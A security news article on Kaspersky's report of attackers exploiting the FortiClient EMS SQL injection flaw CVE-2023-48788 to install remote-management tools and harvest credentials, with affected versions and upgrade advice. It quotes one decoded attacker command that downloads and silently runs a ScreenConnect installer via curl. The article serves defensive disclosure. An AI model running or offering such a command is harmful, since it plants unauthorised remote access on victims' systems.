Kaspersky Uncovers Active Exploitation of Fortinet Vulnerability CVE-2023-48788

In a recent investigation, Kaspersky’s Global Emergency Response Team (GERT) uncovered active exploitation of a patched vulnerability in Fortinet FortiClient EMS. This SQL injection vulnerability, identified as CVE-2023-48788, affects FortiClient EMS versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2. Despite patches being available, attackers continue to exploit unupdated systems, enabling unauthorized code execution and network compromise.

According to the report, the vulnerability arises from improper filtering of SQL command input. An attacker can send specially crafted packets to execute unauthorized commands. The vulnerability is particularly dangerous when deployed on Windows servers exposed to the internet, as these systems often serve critical business functions like providing secure VPN access to employees.

The attack sequence typically begins with exploiting the vulnerability to deploy remote monitoring and management (RMM) tools, such as AnyDesk and ScreenConnect. This allows threat actors to establish a foothold within the network, enabling further activities like credential theft, lateral movement, and defense evasion.

The vulnerability was exploited in October 2024, when telemetry alerts revealed unauthorized attempts to access registry hives via an admin account on a compromised Windows server, according to GERT analysts. The investigation revealed that the attackers used Base64-encoded payloads and tools like curl and certutil to download malicious installers.

One notable command decoded from the attackers’ scripts was:

curl -o C:\update.exe "https://infinity.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe" & start /B C:\update.exe

The attackers demonstrated adaptability by targeting organizations in various regions, with a notable concentration in South America. Their tactics also included leveraging platforms like webhook.site to gather responses from vulnerable systems.

Webhook.site website | Source: Kaspersky

Key artifacts identified during the investigation included:

• Suspicious entries in ems.log and sql_trace.log, pointing to SQL injection attempts.
• Evidence of credential harvesting tools, such as mimikatz.exe and webbrowserpassview.exe.
• Connections to external servers traced to IP addresses associated with previous malicious campaigns.

GERT’s findings emphasize the need to upgrade FortiClient EMS to versions 7.0.11–7.0.13 or 7.2.3 and later

Related Posts:

• PoC Exploit Released for Critical Fortinet FortiClient EMS CVE-2023-48788 Flaw
• CVE-2023-48788 Exploited: Researcher Details Cyberattacks on Fortinet EMS
• Critical Fortinet Vulnerability Exploited: Hackers Deploy Remote Control Tools and Backdoors
• “Connect:fun” Campaign Targets Media Organizations, Exploits Critical Fortinet Vulnerability